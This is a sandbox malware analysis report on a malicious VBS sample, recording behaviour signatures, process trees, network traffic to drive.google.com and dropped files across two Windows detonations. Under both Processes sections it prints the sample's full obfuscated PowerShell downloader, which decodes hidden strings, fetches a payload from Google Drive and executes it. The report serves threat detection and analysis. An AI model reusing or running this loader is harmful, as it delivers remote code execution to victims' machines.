Malware Analysis Report

2025-08-10 21:50

Sample ID 240608-h4smqaab3t
Target dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs
SHA256 dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde
Tags
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde

Threat Level: Likely malicious

The file dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs was found to be: Likely malicious.

Malicious Activity Summary


Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-08 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-08 07:17

Reported

2024-06-08 07:20

Platform

win7-20240419-en

Max time kernel

119s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tubas = 1;Function Brigaderen($Tautegory){$Chomper=$Tautegory.Length-$Tubas;$Fremkalderskaalene='Substring';For( $Varicelloid=7;$Varicelloid -lt $Chomper;$Varicelloid+=8){$Rumfangsformler+=$Tautegory.$Fremkalderskaalene.Invoke( $Varicelloid, $Tubas);}$Rumfangsformler;}function Eritreansk($Gnubbe){ . ($Rimesters) ($Gnubbe);}$Gauffering75=Brigaderen ' IsobioMSuper eoKarleagzdetekteiHyd icalVanillalcopitapaReh.ndl/Sgefu.k5jagtudf.R.versi0 l.ntie Al.enat(BigeminW rediviguldaldn cepterd jogschoPro toow Efte ts Potli, VulkanbNMisstatTAdenody Tetraf1 .ymeno0,tuccos.Coprodu0Radarov; Isoch Allerp.WUdbudsmi KloofenSque.ch6aesthet4Galskab;peachi, Kont.ahx Gldsfo6 Omn pr4 Gibb r;Bevidst Indha,rLnniveavSensiti:Afg.fts1Brepose2Dioptid1 Horrid.K,melwa0Antropo)Vederkv LinjeriGUforudseTrouveucLatestrkSwoonedo ,azoca/Biote n2Benedic0Usurp r1Frembyd0skabera0Kvilibr1Uneq.ab0Ne.lige1Stanges ,eprofoF DomeniiOnt.logr HymenoeFestm dfTegnekooTainofoxPakse.s/a,ledes1Sitolog2Swahili1 Anmass. Phytol0Bis.ten ';$Skyl96=Brigaderen 'T istedULanternsDesil,cePeriodfrLandbru-postverAKrad.ergFoliatoeFaatallnWe,ooletFormule ';$Sommerlejrs=Brigaderen 'SynoekyhMellititAudiofot KinnikpT akeoesUdrykni:Ser.ice/ Quisli/Neur.med LavaerrS.ayboliPrsteskvUdsendoeTings,e. Raimeng Funde oAnt.ropo Orbitsg Ci,ronlTvangsae Dis as.NewtonkcBrislino mitsomm Glorif/ BestrauNupt,alcAvleres? skrivee,afjulex.rnnegap RescoroHovedpirXeromortFlamini=InterlidReko,vaouskaanswfjset mnDgneneolUnrev roFrilleraSmaaligdPrealle& RecitaiParafradTakneml=Dagsomm1.ationaURunesteaV.rksomEAnlgstj6.ennierA Over.t9RadioakoU,rligsGimdeg.aNLuftvrd6 WildfoEGo lsspLEkst,ab_ un eekvHolognadKreisfuvBesttergDa.nissORecessiv,everymOUnfraud4 ,nnovaN Do,rpihi,cipieMVandyke5TvelydeaCourtroVContrabVpreaggrl RverkuA.ejlmeldC,oruseOUnderst ';$Underetagens=Brigaderen '.olitur> Atomke ';$Rimesters=Brigaderen 'Bl.ckiniInflatieMala,maxColiand ';$Outkicked='Studiebesg';$Materialprvning160 = Brigaderen 'U contre Aggresc Bruddeh imdesaoSk.llen Analys%Av nceraPostvsepFangedepTowboatdSamfundaAbsoluttReificeaMestern%Bjlena,\ MultisCQuaintea,rooklymPaxillapTiebo.thosseocao Op niar SolidaaMumpme,tOverflyeHugge,e.JonosfrI.ndecimnSkip.edtSullied Narcoba&Sightse&Marchen AbrasaxeByfo.edcAsilusbhVandforoFolkeva Staalvt Catost ';Eritreansk (Brigaderen 'Piastre$ WantwigSvalegalToadi.roMisdi.ibKonjunkaArbejd l Tandpa:RetorsiRbeknigheNeurot cArbejdsaDo ahshlRingmrkcOverdiliD masketFredlysrPaeonysa Hkerkvt VentaiiRipo,fsoGlas.blnHazel o=fortynd(Fore.skcOverma,mkontokud Efters Antioxi/Be,vangcFremskr Restau$AntepagM CaconyaS,yggert ,attedeIndbererdresseriDiscomma esaticlVrdiladp JordberLgnede.vShithean StyriniDametvanCubomedgFen,ici1Rivalin6K,ntine0Hastesa) An,ass ');Eritreansk (Brigaderen 'Knytte,$RestuffgH.ightslVillachou.gkarlbpy,anssaLabbe,elfolkepa:PhotoporNonintreMacedois UdspritAldohepiMicrocaaNonneglcSuccesle FlygtnoRefingeu SamarbsFor.ikr=Constri$ScablanS HalopeoShoneysmMaca.ammMegathee StikpirGebinddl FrikadeOpacifij PalliarMyxopods Rooibo. PiberesTeaerl,pPhotodelReconceiIsocardtVanskab(Cosmopo$ FirvreU FuskthnHockeysdSaalegne.ythagorPseudo eBiochipt Bioscoa BasarsgredigereHokeyconPrelatesBrunrod)Whensoe ');$Sommerlejrs=$restiaceous[0];$Fjerdedeles= (Brigaderen 'For,rin$BrakpljgEmbed mlsammenkoSystemibRecomf a SidetalZygophy:PhysiopDN dkulesC.rdifoi,rdikengRegrabb=GennembNTraheeneBlondelwDraabne-MissampOCyanomeb H.ppenj kandideInternacRabbinatSendeti CinnamoSramp neySupere,sEksplictCyanamieTegneb.mStoress.UgennemNTran,ple godfretFunktio. Kro,odWLdermbleBystandbUnde.paCneonreklHenseeniI relateSildigenIncorpst');$Fjerdedeles+=$Recalcitration[1];Eritreansk ($Fjerdedeles);Eritreansk (Brigaderen 'Incom,l$ForshapDFa cines SeamosiUnthrivgMorion..MutuallHbefordre Amtr caUnte,podDisinfeeStringmrPuruloisSalolda[Ci cums$venere SFizzkn kBeskyttyBu,dfarlSu,erla9Tenorsa6Sammenl]Litoral=Dispens$ paavisG .etameaBut,kopuEftera fN keligfHypodereSak istrBoligbeivoldshan Dokumeg Afs,ri7Afgjord5Veinies ');$Georgians=Brigaderen ' Warmho$ .izequDStoedtdsbaroksti MeowsrgS.illin.Fjer itDHemicenoExponibwSp.rtsfnPladskrl Indu.topalstafaA,mstoldDeposi,F AnbriniTrikololRuflende Tegl,n(Underkj$DeklassSCompulso BrostemMahalapm Fag ideOpvarmer .nkasslformalieunmol.sjSlackenrKoppev,sDefinit,Politik$SkisporMStolemarAmetabok PingueeorbiculsB,selbeaAssa sigHindbrmeIrrepenrBvresdenGawbyloe UppbadsH.stori2Helsink2gyn dio9U,raabs) .ejrst ';$Mrkesagernes229=$Recalcitration[0];Eritreansk (Brigaderen 'Sabel,i$Disor,egSpaanpllCancio oTende cbProlixiaP.acidnlR sprmi:KatetenMDrmmereoAs ptolsDrumloieyesotiddEurus.beBowl.ss=Mishags(Lionis.TPresseeeRespectsTe.oristUnprotu-Paatr,kPUnoperaacryogentPas ourh Ang oc A vtage$Fort,ltMHsternerRevisiokCamelidepestaersInst.ncaHidkaldgExemptieSystemprAtomermnNanomete OuthypsMeshuga2 negois2Calpack9Sektere)Damasce ');while (!$Mosede) {Eritreansk (Brigaderen 'Vertika$Gtepag.gRepulsilDominanoAfspejlbFremtida aastoflfli,pet:kogerskUToksikodUdbud,tsinclusomCarinasyUnwhimpk etingkDiminiseUncolladUnabashe Hellig=,ovetin$UnhookstPerioptrcallipyuLigningeTis yks ') ;Eritreansk $Georgians;Eritreansk (Brigaderen 'SubetleS GudesatSloteneaUdskejerRek.isit S.para-GudgiveSAldolizlPilledbeMicromee Paral,pValdrap Miljakt4wardshi ');Eritreansk (Brigaderen 'Fetaost$EksemplganstteslFstemndoGiselanbBrucellaAtomhemlVaeltei:HypostoMM.skottoUbetonesNonaffieSikkerhdUndvrlie Klangf=Genindt(DemonstTWate,steDingless unr sutPoritef-DethronPRaaski.aK lonistMinensjhhobbyh, Foge,er$Vei.ersM be.ogtrGutturikHearseceTaliasbs baklysaMeddelagSniv,leeElskerir Ov,rlbnSe,iaeneLigenessTrkosts2 Snakel2 Owerle9Gangste) T atha ') ;Eritreansk (Brigaderen 'Bortfre$Sub lobgUsdeli.lTe,eskooSale wobKikke,taRealiv lAcetoth:De igraSLactuceuMeijizepPy,opesp unnito.ogiernsRitzymeibrskur.tLascarii OpridsoUncredinUltranaeSlittesrPilchernSeismogeLotionpsunbaste9siv pit6 Deling=Hyp,rvi$Tun,ellg ParlialBruustaoPennysibTri.lunaBeladyilCa,diog:Qu.nariSTh,rdisevelsestrOvereatgSkraalelTimelofoHighbinb M.ssekuFrizadolHundekuiMander n Eflreh+ Co,nte+ Tumlin% ,emiau$bisayanrCamailseGhostf.sKitchentgluciddiCoggledaSmileryc Egen,ie Bog aroFortaleuDeclinesPepin.l.BnkendecYeomanho Ste nuuPlatyrrn otifitSki,rco ') ;$Sommerlejrs=$restiaceous[$Suppositionernes96];}$Udmrker9=329315;$Betjentene=28891;Eritreansk (Brigaderen '.adioas$ .esvergMangelllOvertemo InnuatbVenligha anuttlVikl,ng:.ndianeSfagstudtBkkenbuuVagtskip forbrneB.silicfAksemagiAbbrevieCommissr nsehol Trnere=hyg,eni Sk,etsoGZygota.eEx,alantstvstor-MaskensCBoardinoTopogranGudstjetGu.dsmeeCentaurnStrudsmtUninter Underf$Int,midM L.keror He,tevk Perinee.nopskys,rebaneaAfbarkeg acunareskorsterFremlaenHaystaceCarnivosTvangsi2Fikserb2Antagon9.orship ');Eritreansk (Brigaderen ' R,sgif$OmvisnigSubcomml RetrogoHou,elebKontohaaPeck kal Algebr:ReabsoreLogli enEncroacgdobbeltrPalaeobo BacksesMe.ernepEqu.cosr Hvaleri tejst,sErhver,eterpentrGnavernnHovedhjeOv rhitsPilgrim Lrebo s=Disa,fe Umyndig[F totekS BadestyRondelesRestriktPrologied.svulnmDebitso.Su.tesgCFeller.oUndervanAfmyto,vTildrage SemisirBetjenitWhitewa]Purpure:vestitu:NuzzerkFIntratrr IsraeloSharon,mSerienuBBigeminaBambu,ms Assotse ,ubten6Medtage4 k ravaSRoerenttHilltoprDesignli promenn tidiphgTruantl( Remoti$SlappetSIntell tPi,paycuStraffepBrdskreebra,kedf ,tinkaiMilj eee SexiporStyrkel)Trepidl ');Eritreansk (Brigaderen 'Per.spl$Surpr.cgSejlspolRadereto Epi,iabPredeleareshowelFrisken:jammerlSnondetrnVillaseu UnsmokgSpgelsegAfstamnlDngendeyLegatkr Indlade=Alenepi Venst,e[Enwe veSAnallany H,linesVoldf tt Ken.aueSvidesumBromate.Hovel,iTBadeniceDeklamax NonrattEmpathi.EngraftEBe,alusnBle endcSubtopioFlorizidMedarbei,ancuninIndustrgblkhusu]Varskor:U,splen: OverseAIm roprS okumeCTrningsIDerivatIForuren.SlingreG KrigsmeDesperatHandglaSHo.ocert Hoevisr SimbliiLdigerenPetuniegudkonku(Vestmen$Bi,telee ProgranC,ntraegMantaudrLochinooFirebrisV,versbpSodak,gr,ngarebiUrpremisReemergeReexprerVrdifasnRanidpreUnshipwsCo.mand) Snesko ');Eritreansk (Brigaderen 'Amylans$BlennotgLjerliglKul.urboArbejdsbD,mfldtaCleanlilSinfoni:kl,pperOOmklassnIllegaldindtal uDenimsnl GldesleRaavildrGlidebaeLineolad DobbeleVand.ogsForuren=Erwinco$TrilogiSSurahipnVariantuCha,ottg P.rtrtgDisservlSka aerySkiftva.Douchins AfkalkuR stendbVolatilsIstr,ant Fonetir Insurri SamsennEsdragogForrib (Skjalde$Vug,iesU irginidEternizmStrapher GlippekPennepreSmirk urLedeord9Sendere,Uncount$OverdecB Daabsfe Vaagebt Rotatij Dyret e .ageannPrydsastHeptrane Re.tetnConcerteReds.ar)incurre ');Eritreansk $Onduleredes;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

MD5 19c2705572794894cfb99f2e8a39e54a
SHA1 bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c
SHA256 24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99
SHA512 7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

memory/736-330-0x000007FEF54BE000-0x000007FEF54BF000-memory.dmp

memory/736-333-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/736-332-0x00000000027F0000-0x00000000027F8000-memory.dmp

memory/736-331-0x000000001B640000-0x000000001B922000-memory.dmp

memory/736-334-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/736-335-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/736-336-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/736-337-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

memory/736-340-0x000007FEF5200000-0x000007FEF5B9D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-08 07:17

Reported

2024-06-08 07:20

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tubas = 1;Function Brigaderen($Tautegory){$Chomper=$Tautegory.Length-$Tubas;$Fremkalderskaalene='Substring';For( $Varicelloid=7;$Varicelloid -lt $Chomper;$Varicelloid+=8){$Rumfangsformler+=$Tautegory.$Fremkalderskaalene.Invoke( $Varicelloid, $Tubas);}$Rumfangsformler;}function Eritreansk($Gnubbe){ . ($Rimesters) ($Gnubbe);}$Gauffering75=Brigaderen ' IsobioMSuper eoKarleagzdetekteiHyd icalVanillalcopitapaReh.ndl/Sgefu.k5jagtudf.R.versi0 l.ntie Al.enat(BigeminW rediviguldaldn cepterd jogschoPro toow Efte ts Potli, VulkanbNMisstatTAdenody Tetraf1 .ymeno0,tuccos.Coprodu0Radarov; Isoch Allerp.WUdbudsmi KloofenSque.ch6aesthet4Galskab;peachi, Kont.ahx Gldsfo6 Omn pr4 Gibb r;Bevidst Indha,rLnniveavSensiti:Afg.fts1Brepose2Dioptid1 Horrid.K,melwa0Antropo)Vederkv LinjeriGUforudseTrouveucLatestrkSwoonedo ,azoca/Biote n2Benedic0Usurp r1Frembyd0skabera0Kvilibr1Uneq.ab0Ne.lige1Stanges ,eprofoF DomeniiOnt.logr HymenoeFestm dfTegnekooTainofoxPakse.s/a,ledes1Sitolog2Swahili1 Anmass. Phytol0Bis.ten ';$Skyl96=Brigaderen 'T istedULanternsDesil,cePeriodfrLandbru-postverAKrad.ergFoliatoeFaatallnWe,ooletFormule ';$Sommerlejrs=Brigaderen 'SynoekyhMellititAudiofot KinnikpT akeoesUdrykni:Ser.ice/ Quisli/Neur.med LavaerrS.ayboliPrsteskvUdsendoeTings,e. Raimeng Funde oAnt.ropo Orbitsg Ci,ronlTvangsae Dis as.NewtonkcBrislino mitsomm Glorif/ BestrauNupt,alcAvleres? skrivee,afjulex.rnnegap RescoroHovedpirXeromortFlamini=InterlidReko,vaouskaanswfjset mnDgneneolUnrev roFrilleraSmaaligdPrealle& RecitaiParafradTakneml=Dagsomm1.ationaURunesteaV.rksomEAnlgstj6.ennierA Over.t9RadioakoU,rligsGimdeg.aNLuftvrd6 WildfoEGo lsspLEkst,ab_ un eekvHolognadKreisfuvBesttergDa.nissORecessiv,everymOUnfraud4 ,nnovaN Do,rpihi,cipieMVandyke5TvelydeaCourtroVContrabVpreaggrl RverkuA.ejlmeldC,oruseOUnderst ';$Underetagens=Brigaderen '.olitur> Atomke ';$Rimesters=Brigaderen 'Bl.ckiniInflatieMala,maxColiand ';$Outkicked='Studiebesg';$Materialprvning160 = Brigaderen 'U contre Aggresc Bruddeh imdesaoSk.llen Analys%Av nceraPostvsepFangedepTowboatdSamfundaAbsoluttReificeaMestern%Bjlena,\ MultisCQuaintea,rooklymPaxillapTiebo.thosseocao Op niar SolidaaMumpme,tOverflyeHugge,e.JonosfrI.ndecimnSkip.edtSullied Narcoba&Sightse&Marchen AbrasaxeByfo.edcAsilusbhVandforoFolkeva Staalvt Catost ';Eritreansk (Brigaderen 'Piastre$ WantwigSvalegalToadi.roMisdi.ibKonjunkaArbejd l Tandpa:RetorsiRbeknigheNeurot cArbejdsaDo ahshlRingmrkcOverdiliD masketFredlysrPaeonysa Hkerkvt VentaiiRipo,fsoGlas.blnHazel o=fortynd(Fore.skcOverma,mkontokud Efters Antioxi/Be,vangcFremskr Restau$AntepagM CaconyaS,yggert ,attedeIndbererdresseriDiscomma esaticlVrdiladp JordberLgnede.vShithean StyriniDametvanCubomedgFen,ici1Rivalin6K,ntine0Hastesa) An,ass ');Eritreansk (Brigaderen 'Knytte,$RestuffgH.ightslVillachou.gkarlbpy,anssaLabbe,elfolkepa:PhotoporNonintreMacedois UdspritAldohepiMicrocaaNonneglcSuccesle FlygtnoRefingeu SamarbsFor.ikr=Constri$ScablanS HalopeoShoneysmMaca.ammMegathee StikpirGebinddl FrikadeOpacifij PalliarMyxopods Rooibo. PiberesTeaerl,pPhotodelReconceiIsocardtVanskab(Cosmopo$ FirvreU FuskthnHockeysdSaalegne.ythagorPseudo eBiochipt Bioscoa BasarsgredigereHokeyconPrelatesBrunrod)Whensoe ');$Sommerlejrs=$restiaceous[0];$Fjerdedeles= (Brigaderen 'For,rin$BrakpljgEmbed mlsammenkoSystemibRecomf a SidetalZygophy:PhysiopDN dkulesC.rdifoi,rdikengRegrabb=GennembNTraheeneBlondelwDraabne-MissampOCyanomeb H.ppenj kandideInternacRabbinatSendeti CinnamoSramp neySupere,sEksplictCyanamieTegneb.mStoress.UgennemNTran,ple godfretFunktio. Kro,odWLdermbleBystandbUnde.paCneonreklHenseeniI relateSildigenIncorpst');$Fjerdedeles+=$Recalcitration[1];Eritreansk ($Fjerdedeles);Eritreansk (Brigaderen 'Incom,l$ForshapDFa cines SeamosiUnthrivgMorion..MutuallHbefordre Amtr caUnte,podDisinfeeStringmrPuruloisSalolda[Ci cums$venere SFizzkn kBeskyttyBu,dfarlSu,erla9Tenorsa6Sammenl]Litoral=Dispens$ paavisG .etameaBut,kopuEftera fN keligfHypodereSak istrBoligbeivoldshan Dokumeg Afs,ri7Afgjord5Veinies ');$Georgians=Brigaderen ' Warmho$ .izequDStoedtdsbaroksti MeowsrgS.illin.Fjer itDHemicenoExponibwSp.rtsfnPladskrl Indu.topalstafaA,mstoldDeposi,F AnbriniTrikololRuflende Tegl,n(Underkj$DeklassSCompulso BrostemMahalapm Fag ideOpvarmer .nkasslformalieunmol.sjSlackenrKoppev,sDefinit,Politik$SkisporMStolemarAmetabok PingueeorbiculsB,selbeaAssa sigHindbrmeIrrepenrBvresdenGawbyloe UppbadsH.stori2Helsink2gyn dio9U,raabs) .ejrst ';$Mrkesagernes229=$Recalcitration[0];Eritreansk (Brigaderen 'Sabel,i$Disor,egSpaanpllCancio oTende cbProlixiaP.acidnlR sprmi:KatetenMDrmmereoAs ptolsDrumloieyesotiddEurus.beBowl.ss=Mishags(Lionis.TPresseeeRespectsTe.oristUnprotu-Paatr,kPUnoperaacryogentPas ourh Ang oc A vtage$Fort,ltMHsternerRevisiokCamelidepestaersInst.ncaHidkaldgExemptieSystemprAtomermnNanomete OuthypsMeshuga2 negois2Calpack9Sektere)Damasce ');while (!$Mosede) {Eritreansk (Brigaderen 'Vertika$Gtepag.gRepulsilDominanoAfspejlbFremtida aastoflfli,pet:kogerskUToksikodUdbud,tsinclusomCarinasyUnwhimpk etingkDiminiseUncolladUnabashe Hellig=,ovetin$UnhookstPerioptrcallipyuLigningeTis yks ') ;Eritreansk $Georgians;Eritreansk (Brigaderen 'SubetleS GudesatSloteneaUdskejerRek.isit S.para-GudgiveSAldolizlPilledbeMicromee Paral,pValdrap Miljakt4wardshi ');Eritreansk (Brigaderen 'Fetaost$EksemplganstteslFstemndoGiselanbBrucellaAtomhemlVaeltei:HypostoMM.skottoUbetonesNonaffieSikkerhdUndvrlie Klangf=Genindt(DemonstTWate,steDingless unr sutPoritef-DethronPRaaski.aK lonistMinensjhhobbyh, Foge,er$Vei.ersM be.ogtrGutturikHearseceTaliasbs baklysaMeddelagSniv,leeElskerir Ov,rlbnSe,iaeneLigenessTrkosts2 Snakel2 Owerle9Gangste) T atha ') ;Eritreansk (Brigaderen 'Bortfre$Sub lobgUsdeli.lTe,eskooSale wobKikke,taRealiv lAcetoth:De igraSLactuceuMeijizepPy,opesp unnito.ogiernsRitzymeibrskur.tLascarii OpridsoUncredinUltranaeSlittesrPilchernSeismogeLotionpsunbaste9siv pit6 Deling=Hyp,rvi$Tun,ellg ParlialBruustaoPennysibTri.lunaBeladyilCa,diog:Qu.nariSTh,rdisevelsestrOvereatgSkraalelTimelofoHighbinb M.ssekuFrizadolHundekuiMander n Eflreh+ Co,nte+ Tumlin% ,emiau$bisayanrCamailseGhostf.sKitchentgluciddiCoggledaSmileryc Egen,ie Bog aroFortaleuDeclinesPepin.l.BnkendecYeomanho Ste nuuPlatyrrn otifitSki,rco ') ;$Sommerlejrs=$restiaceous[$Suppositionernes96];}$Udmrker9=329315;$Betjentene=28891;Eritreansk (Brigaderen '.adioas$ .esvergMangelllOvertemo InnuatbVenligha anuttlVikl,ng:.ndianeSfagstudtBkkenbuuVagtskip forbrneB.silicfAksemagiAbbrevieCommissr nsehol Trnere=hyg,eni Sk,etsoGZygota.eEx,alantstvstor-MaskensCBoardinoTopogranGudstjetGu.dsmeeCentaurnStrudsmtUninter Underf$Int,midM L.keror He,tevk Perinee.nopskys,rebaneaAfbarkeg acunareskorsterFremlaenHaystaceCarnivosTvangsi2Fikserb2Antagon9.orship ');Eritreansk (Brigaderen ' R,sgif$OmvisnigSubcomml RetrogoHou,elebKontohaaPeck kal Algebr:ReabsoreLogli enEncroacgdobbeltrPalaeobo BacksesMe.ernepEqu.cosr Hvaleri tejst,sErhver,eterpentrGnavernnHovedhjeOv rhitsPilgrim Lrebo s=Disa,fe Umyndig[F totekS BadestyRondelesRestriktPrologied.svulnmDebitso.Su.tesgCFeller.oUndervanAfmyto,vTildrage SemisirBetjenitWhitewa]Purpure:vestitu:NuzzerkFIntratrr IsraeloSharon,mSerienuBBigeminaBambu,ms Assotse ,ubten6Medtage4 k ravaSRoerenttHilltoprDesignli promenn tidiphgTruantl( Remoti$SlappetSIntell tPi,paycuStraffepBrdskreebra,kedf ,tinkaiMilj eee SexiporStyrkel)Trepidl ');Eritreansk (Brigaderen 'Per.spl$Surpr.cgSejlspolRadereto Epi,iabPredeleareshowelFrisken:jammerlSnondetrnVillaseu UnsmokgSpgelsegAfstamnlDngendeyLegatkr Indlade=Alenepi Venst,e[Enwe veSAnallany H,linesVoldf tt Ken.aueSvidesumBromate.Hovel,iTBadeniceDeklamax NonrattEmpathi.EngraftEBe,alusnBle endcSubtopioFlorizidMedarbei,ancuninIndustrgblkhusu]Varskor:U,splen: OverseAIm roprS okumeCTrningsIDerivatIForuren.SlingreG KrigsmeDesperatHandglaSHo.ocert Hoevisr SimbliiLdigerenPetuniegudkonku(Vestmen$Bi,telee ProgranC,ntraegMantaudrLochinooFirebrisV,versbpSodak,gr,ngarebiUrpremisReemergeReexprerVrdifasnRanidpreUnshipwsCo.mand) Snesko ');Eritreansk (Brigaderen 'Amylans$BlennotgLjerliglKul.urboArbejdsbD,mfldtaCleanlilSinfoni:kl,pperOOmklassnIllegaldindtal uDenimsnl GldesleRaavildrGlidebaeLineolad DobbeleVand.ogsForuren=Erwinco$TrilogiSSurahipnVariantuCha,ottg P.rtrtgDisservlSka aerySkiftva.Douchins AfkalkuR stendbVolatilsIstr,ant Fonetir Insurri SamsennEsdragogForrib (Skjalde$Vug,iesU irginidEternizmStrapher GlippekPennepreSmirk urLedeord9Sendere,Uncount$OverdecB Daabsfe Vaagebt Rotatij Dyret e .ageannPrydsastHeptrane Re.tetnConcerteReds.ar)incurre ');Eritreansk $Onduleredes;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 161.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

MD5 19c2705572794894cfb99f2e8a39e54a
SHA1 bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c
SHA256 24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99
SHA512 7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

memory/3644-313-0x00007FFE89773000-0x00007FFE89775000-memory.dmp

memory/3644-314-0x000001F412B10000-0x000001F412B32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0sxdlstl.5lr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3644-324-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

memory/3644-325-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

memory/3644-328-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

memory/3644-329-0x00007FFE89770000-0x00007FFE8A231000-memory.dmp

